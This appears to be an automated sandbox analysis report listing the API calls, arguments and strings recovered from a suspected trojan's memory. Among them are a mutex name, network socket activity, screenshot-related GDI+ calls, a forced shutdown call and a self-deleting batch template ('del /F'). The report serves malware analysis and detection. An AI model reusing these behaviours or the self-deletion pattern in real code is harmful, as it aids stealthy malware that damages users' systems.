MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00C55C2A

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Strings

?\C, xrefs: 00C55BBC

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2C41C, Relevance: 9.1, APIs: 5, Instructions: 137

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C44D

Part of subcall function 00C4D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C4D0B5

WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C4DF

Part of subcall function 00C2BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00C2C08A
Part of subcall function 00C2BFFE: GetHandleInformation.KERNEL32(?,?), ref: 00C2C09C
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000001,00000006), ref: 00C2C0CF
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000002,00000011), ref: 00C2C0E0
Part of subcall function 00C2BFFE: closesocket.WS2_32(00000002), ref: 00C2C0FF
Part of subcall function 00C2BFFE: closesocket.WS2_32 ref: 00C2C106
Part of subcall function 00C2BFFE: memset.MSVCRT ref: 00C2C1C8
Part of subcall function 00C2BFFE: memcpy.MSVCRT ref: 00C2C3C8

SetEvent.KERNEL32 ref: 00C2C532
SetEvent.KERNEL32 ref: 00C2C56B

Part of subcall function 00C4D090: SetEvent.KERNEL32 ref: 00C4D0A0

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C5F0

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C453C3, Relevance: 9.1, APIs: 6, Instructions: 61

APIs

Part of subcall function 00C448F2: GetModuleHandleW.KERNEL32 ref: 00C44932
Part of subcall function 00C448F2: WSAStartup.WS2_32(00000202,?), ref: 00C44998
Part of subcall function 00C448F2: CreateEventW.KERNEL32(00C62974,00000001), ref: 00C449BA
Part of subcall function 00C448F2: GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00C449EC
Part of subcall function 00C448F2: GetCurrentProcessId.KERNEL32 ref: 00C44A17

SetErrorMode.KERNEL32(00008007), ref: 00C453DC
GetCommandLineW.KERNEL32 ref: 00C453E8
CommandLineToArgvW.SHELL32 ref: 00C453EF
LocalFree.KERNEL32 ref: 00C4542C
ExitProcess.KERNEL32(00000001), ref: 00C4543D

Part of subcall function 00C45087: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4512D
Part of subcall function 00C45087: GetLastError.KERNEL32(?,?,00000001,?,?,?,00C45452), ref: 00C4513D
Part of subcall function 00C45087: CloseHandle.KERNEL32 ref: 00C4514B
Part of subcall function 00C45087: lstrlenW.KERNEL32(?), ref: 00C451AD
Part of subcall function 00C45087: ExitWindowsEx.USER32(00000014,80000000), ref: 00C451DD
Part of subcall function 00C45087: OpenEventW.KERNEL32(00000002,00000000,?), ref: 00C45203
Part of subcall function 00C45087: SetEvent.KERNEL32 ref: 00C45210
Part of subcall function 00C45087: CloseHandle.KERNEL32 ref: 00C45217
Part of subcall function 00C45087: CloseHandle.KERNEL32 ref: 00C45229
Part of subcall function 00C45087: IsWellKnownSid.ADVAPI32(00F41EC0,00000016), ref: 00C45279
Part of subcall function 00C45087: CreateEventW.KERNEL32(00C62974,00000001,00000000,?), ref: 00C45348
Part of subcall function 00C45087: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C45361
Part of subcall function 00C45087: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C45373
Part of subcall function 00C45087: CloseHandle.KERNEL32(00000000), ref: 00C4538A
Part of subcall function 00C45087: CloseHandle.KERNEL32(?), ref: 00C45390
Part of subcall function 00C45087: CloseHandle.KERNEL32(?), ref: 00C45396

Sleep.KERNEL32(000000FF), ref: 00C45463

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4027E, Relevance: 9.0, APIs: 5, Instructions: 119

APIs

#8.OLEAUT32(?,?,00C21618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00C40301

Part of subcall function 00C31BDD: #6.OLEAUT32 ref: 00C31BE7
Part of subcall function 00C31BDD: #2.OLEAUT32(ProhibitDTD), ref: 00C31BF5

#6.OLEAUT32(00000000,?,00C21618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00C40350
#8.OLEAUT32(?), ref: 00C4035B
#2.OLEAUT32(?), ref: 00C4036D
#9.OLEAUT32(?), ref: 00C403A4

Part of subcall function 00C507B1: CoCreateInstance.OLE32(00C217F8,00000000,00004401,00C21858,?), ref: 00C507C6

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4582C, Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 38

APIs

EnterCriticalSection.KERNEL32(Function_00043510,?,?,?,00C3E9BA), ref: 00C45842
LeaveCriticalSection.KERNEL32(Function_00043510,?,?,?,00C3E9BA), ref: 00C45868

Part of subcall function 00C4575A: memset.MSVCRT ref: 00C45774
Part of subcall function 00C4575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C457BA

CreateMutexW.KERNEL32(00C62974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00C4587A

Part of subcall function 00C32F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C32F37
Part of subcall function 00C32F31: CloseHandle.KERNEL32 ref: 00C32F49

Strings

Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00C4586F

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351EFB6, Relevance: 9.0, APIs: 5, Instructions: 74

APIs

RtlEncodePointer.NTDLL(?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351EFCB
RtlEncodePointer.NTDLL(?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351EFD8

Part of subcall function 03520896: HeapSize.KERNEL32(00000000,00000000,?,0351EFF6,?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?), ref: 035208C1

Part of subcall function 0351FF71: Sleep.KERNEL32(00000000), ref: 0351FF9B

EncodePointer.KERNEL32(?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351F03D
RtlEncodePointer.NTDLL(?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351F051
RtlEncodePointer.NTDLL(?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351F059

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C39925, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 71

APIs

memcpy.MSVCRT ref: 00C3993C

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

memcmp.MSVCRT ref: 00C3995E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3998C

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

lstrcmpiW.KERNEL32(?), ref: 00C399DC

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C399AD

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52B3C, Relevance: 9.0, APIs: 5, Instructions: 69

APIs

Part of subcall function 00C527C1: socket.WS2_32(?,?,00000006), ref: 00C527F5

connect.WS2_32(?,?), ref: 00C52B7A
WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00C52B89
WSASetLastError.WS2_32(?), ref: 00C52BE7

Part of subcall function 00C52968: shutdown.WS2_32(?,00000002), ref: 00C52976
Part of subcall function 00C52968: closesocket.WS2_32(?), ref: 00C5297F
Part of subcall function 00C52968: WSACloseEvent.WS2_32(?), ref: 00C52992

Part of subcall function 00C52917: WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
Part of subcall function 00C52917: WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
Part of subcall function 00C52917: WSACloseEvent.WS2_32(?), ref: 00C52957

WSASetLastError.WS2_32 ref: 00C52BA7
WSAGetLastError.WS2_32 ref: 00C52BA9

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31791, Relevance: 9.0, APIs: 5, Instructions: 66

APIs

InitializeCriticalSection.KERNEL32(00C63510), ref: 00C317B1

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

InitializeCriticalSection.KERNEL32 ref: 00C317C6
memset.MSVCRT ref: 00C317DB
TlsAlloc.KERNEL32(?,00000000,00C44986,?,?,00000001), ref: 00C317F2
GetModuleHandleW.KERNEL32(?), ref: 00C31817

Part of subcall function 00C38DB0: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C31829,?,00000000,00C44986,?,?,00000001), ref: 00C38DC0
Part of subcall function 00C38DB0: LeaveCriticalSection.KERNEL32(00C63510,?,00000000,00C44986,?,?,00000001), ref: 00C38DE8

Part of subcall function 00C31857: TlsFree.KERNEL32(?), ref: 00C31863
Part of subcall function 00C31857: DeleteCriticalSection.KERNEL32(00F41E90,00000000,00C31851,00F41E90,?,00000000,00C44986,?,?,00000001), ref: 00C3186A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C40799, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C407CF

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

lstrcatW.KERNEL32(?,.dat), ref: 00C4082F
lstrlenW.KERNEL32 ref: 00C40844

Part of subcall function 00C31AAE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C31ACA
Part of subcall function 00C31AAE: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C31AED
Part of subcall function 00C31AAE: CloseHandle.KERNEL32 ref: 00C31AFA

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C407F0
.dat, xrefs: 00C40823

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C507DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

InternetSetOptionA.WININET(?,00000003,00C26FA4,00000004), ref: 00C50805

Part of subcall function 00C46FD3: EnterCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C46FE3
Part of subcall function 00C46FD3: LeaveCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C47009

GetAcceptLanguagesA.SHLWAPI ref: 00C5084C
memcpy.MSVCRT ref: 00C50886
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 00C508BF

Strings

Accept-Language: , xrefs: 00C50880

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2AD53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

Part of subcall function 00C46FD3: EnterCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C46FE3
Part of subcall function 00C46FD3: LeaveCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C47009

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C2ADA3
GetProcAddress.KERNEL32(?,GetProductInfo), ref: 00C2ADB3
GetSystemDefaultUILanguage.KERNEL32(?,00C2AA9B), ref: 00C2ADEE

Strings

kernel32.dll, xrefs: 00C2AD9E
GetProductInfo, xrefs: 00C2ADAD

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C55D27, Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 81

APIs

GetTempPathW.KERNEL32(00000104), ref: 00C55D3A
lstrcpyA.KERNEL32(?,00C2939A,00000000,00C55FC9,?,?,?,00C55FC9,?,?,?,?,?,?,?,00C3BD61), ref: 00C55DD1
lstrcpynA.KERNEL32(?,?\C,00000003,?,00C2939A,00000000,00C55FC9,?,?,?,00C55FC9,?), ref: 00C55DE7

Strings

?\C, xrefs: 00C55DDC

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2D2F7, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 77

APIs

VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00C2D315
VerQueryValueW.VERSION(?,?,?,?), ref: 00C2D382

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Strings

\VarFileInfo\Translation, xrefs: 00C2D30A
\StringFileInfo\%04x%04x\%s, xrefs: 00C2D357

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3332C, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 44

APIs

GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00C33341
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00C3334C

Part of subcall function 00C3338D: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00C333AB
Part of subcall function 00C3338D: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00C333B6
Part of subcall function 00C3338D: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00C333C1
Part of subcall function 00C3338D: lstrcmpiW.KERNEL32(?), ref: 00C3344E
Part of subcall function 00C3338D: memcpy.MSVCRT ref: 00C33471
Part of subcall function 00C3338D: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C3349C
Part of subcall function 00C3338D: memcpy.MSVCRT ref: 00C334CA

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 00C3333A
GdipDisposeImage, xrefs: 00C33343

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351D55A, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleW.KERNEL32(mscoree.dll), ref: 0351D564
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 0351D574

Strings

mscoree.dll, xrefs: 0351D55F
CorExitProcess, xrefs: 0351D56E

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C2CD5A, Relevance: 7.9, APIs: 5, Instructions: 109

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CD70
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CE9F

Part of subcall function 00C2F0E1: memcmp.MSVCRT ref: 00C2F0FD

memcpy.MSVCRT ref: 00C2CDCD
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1,?,00000002), ref: 00C2CDDD

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00C2CE11

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFC1
Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFE2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C46C9A, Relevance: 7.9, APIs: 5, Instructions: 252

APIs

memcmp.MSVCRT ref: 00C46D07
memcpy.MSVCRT ref: 00C46E14

Part of subcall function 00C52B3C: connect.WS2_32(?,?), ref: 00C52B7A
Part of subcall function 00C52B3C: WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00C52B89
Part of subcall function 00C52B3C: WSASetLastError.WS2_32 ref: 00C52BA7
Part of subcall function 00C52B3C: WSAGetLastError.WS2_32 ref: 00C52BA9
Part of subcall function 00C52B3C: WSASetLastError.WS2_32(?), ref: 00C52BE7

memcmp.MSVCRT ref: 00C46F11

Part of subcall function 00C52EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00C2FD6D,?,00000004,00007530,?,?,?,?), ref: 00C52ED9
Part of subcall function 00C52EA3: WSASetLastError.WS2_32(?), ref: 00C52F21

Part of subcall function 00C46A51: memcmp.MSVCRT ref: 00C46A97

Part of subcall function 00C45D47: memset.MSVCRT ref: 00C45D57
Part of subcall function 00C45D47: memcpy.MSVCRT ref: 00C45D80

memset.MSVCRT ref: 00C46F76
memcpy.MSVCRT ref: 00C46F87

Part of subcall function 00C45D97: memcpy.MSVCRT ref: 00C45DA8

Part of subcall function 00C469A2: memcmp.MSVCRT ref: 00C469DE

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2D6C8, Relevance: 7.9, APIs: 5, Instructions: 86

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00C2D6D2
memcpy.MSVCRT ref: 00C2D74E
memcpy.MSVCRT ref: 00C2D762
memcpy.MSVCRT ref: 00C2D78C
LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000), ref: 00C2D7B2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35A4F, Relevance: 7.8, APIs: 4, Instructions: 27

APIs

GetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A51

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

TlsGetValue.KERNEL32(?,?,00C2B9B4), ref: 00C35A6E
TlsSetValue.KERNEL32(00000001), ref: 00C35A80
SetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A90

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4B562, Relevance: 7.8, APIs: 5, Instructions: 133

APIs

memset.MSVCRT ref: 00C4B587
memcpy.MSVCRT ref: 00C4B5E7
memcpy.MSVCRT ref: 00C4B5FF

Part of subcall function 00C29F94: memset.MSVCRT ref: 00C29FA8

Part of subcall function 00C3BD8C: memset.MSVCRT ref: 00C3BE17

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00C4B66A
memcpy.MSVCRT ref: 00C4B6A8

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36D60, Relevance: 7.8, APIs: 4, Instructions: 68

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36D88
recv.WS2_32(?,?,00000400,00000000), ref: 00C36DB4
send.WS2_32(?,?,?,00000000), ref: 00C36DD6
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36E03

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2C907, Relevance: 7.8, APIs: 4, Instructions: 66

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C961
LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C9C9

Part of subcall function 00C2C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C2C404

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

InterlockedIncrement.KERNEL32 ref: 00C2C99E
SetEvent.KERNEL32 ref: 00C2C9BC

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35B40, Relevance: 7.7, APIs: 4, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35B48
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C35B6C
CloseHandle.KERNEL32 ref: 00C35B7C

Part of subcall function 00C369C9: HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3
Part of subcall function 00C369C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35BAC

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C38459, Relevance: 7.7, APIs: 4, Instructions: 207

APIs

EnterCriticalSection.KERNEL32(0000000C,00000000), ref: 00C384C0

Part of subcall function 00C381D6: GetTickCount.KERNEL32 ref: 00C381DE

LeaveCriticalSection.KERNEL32(0000000C), ref: 00C3869F

Part of subcall function 00C38339: IsBadReadPtr.KERNEL32 ref: 00C38405
Part of subcall function 00C38339: IsBadReadPtr.KERNEL32 ref: 00C38424

getservbyname.WS2_32(?,00000000), ref: 00C3853A

Part of subcall function 00C38A90: memcpy.MSVCRT ref: 00C38C64
Part of subcall function 00C38A90: memcpy.MSVCRT ref: 00C38D64

Part of subcall function 00C38770: memcpy.MSVCRT ref: 00C38944
Part of subcall function 00C38770: memcpy.MSVCRT ref: 00C38A44

memcpy.MSVCRT ref: 00C38619

Part of subcall function 00C52471: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00C62910,?,?), ref: 00C5249E

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C38162: TlsAlloc.KERNEL32(0000000C,00C38636,?,?,?,?,00000000,?), ref: 00C3816B
Part of subcall function 00C38162: TlsGetValue.KERNEL32(?,00000001,0000000C), ref: 00C3817D
Part of subcall function 00C38162: TlsSetValue.KERNEL32(?,?), ref: 00C381C2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35E12, Relevance: 7.7, APIs: 5, Instructions: 68

APIs

EnterCriticalSection.KERNEL32(Function_00043510), ref: 00C35E33
LeaveCriticalSection.KERNEL32(Function_00043510), ref: 00C35E59

Part of subcall function 00C35DBC: InitializeCriticalSection.KERNEL32(00C63648), ref: 00C35DC1
Part of subcall function 00C35DBC: memset.MSVCRT ref: 00C35DD0

EnterCriticalSection.KERNEL32(00C63648), ref: 00C35E64
LeaveCriticalSection.KERNEL32(00C63648), ref: 00C35EDC

Part of subcall function 00C2A509: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C2A54A
Part of subcall function 00C2A509: PathRenameExtensionW.SHLWAPI(?,?), ref: 00C2A59B

Part of subcall function 00C2A5B2: memset.MSVCRT ref: 00C2A757
Part of subcall function 00C2A5B2: memcpy.MSVCRT ref: 00C2A780
Part of subcall function 00C2A5B2: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C2A885
Part of subcall function 00C2A5B2: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2A8A1

Sleep.KERNEL32(000007D0), ref: 00C35ECF

Part of subcall function 00C2A947: memset.MSVCRT ref: 00C2A969

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3F7DB, Relevance: 7.7, APIs: 5, Instructions: 217

APIs

LoadLibraryW.KERNEL32(?), ref: 00C3F838
GetProcAddress.KERNEL32(?,?), ref: 00C3F860
StrChrA.SHLWAPI(?,00000040), ref: 00C3F987

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

StrChrW.SHLWAPI(?,00000040,?,?), ref: 00C3F968

Part of subcall function 00C4C3E0: lstrlenW.KERNEL32(00C27C5C), ref: 00C4C3FC
Part of subcall function 00C4C3E0: lstrlenW.KERNEL32(?), ref: 00C4C402
Part of subcall function 00C4C3E0: memcpy.MSVCRT ref: 00C4C426

FreeLibrary.KERNEL32 ref: 00C3FA6D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4CB99, Relevance: 7.7, APIs: 4, Instructions: 179

APIs

memcpy.MSVCRT ref: 00C4CD50

Part of subcall function 00C4CB99: memcpy.MSVCRT ref: 00C4CBB0
Part of subcall function 00C4CB99: CharLowerA.USER32 ref: 00C4CC7B
Part of subcall function 00C4CB99: CharLowerA.USER32(?), ref: 00C4CC8B

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31FF8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 173

APIs

Part of subcall function 00C52DBA: WSAGetLastError.WS2_32 ref: 00C52DF0
Part of subcall function 00C52DBA: WSASetLastError.WS2_32(00002775), ref: 00C52E54

memcmp.MSVCRT ref: 00C32038
memcmp.MSVCRT ref: 00C32050
memcpy.MSVCRT ref: 00C32085

Part of subcall function 00C4F70B: memcpy.MSVCRT ref: 00C4F718

Part of subcall function 00C4F8BA: memcpy.MSVCRT ref: 00C4F8E7

Part of subcall function 00C2FF1E: EnterCriticalSection.KERNEL32(?,?,00000002,?,?,00C32175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00C2FF57
Part of subcall function 00C2FF1E: LeaveCriticalSection.KERNEL32(0000002C,?,?,00000002,?,?,00C32175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00C2FF7B

Part of subcall function 00C31F85: GetTickCount.KERNEL32 ref: 00C31F92

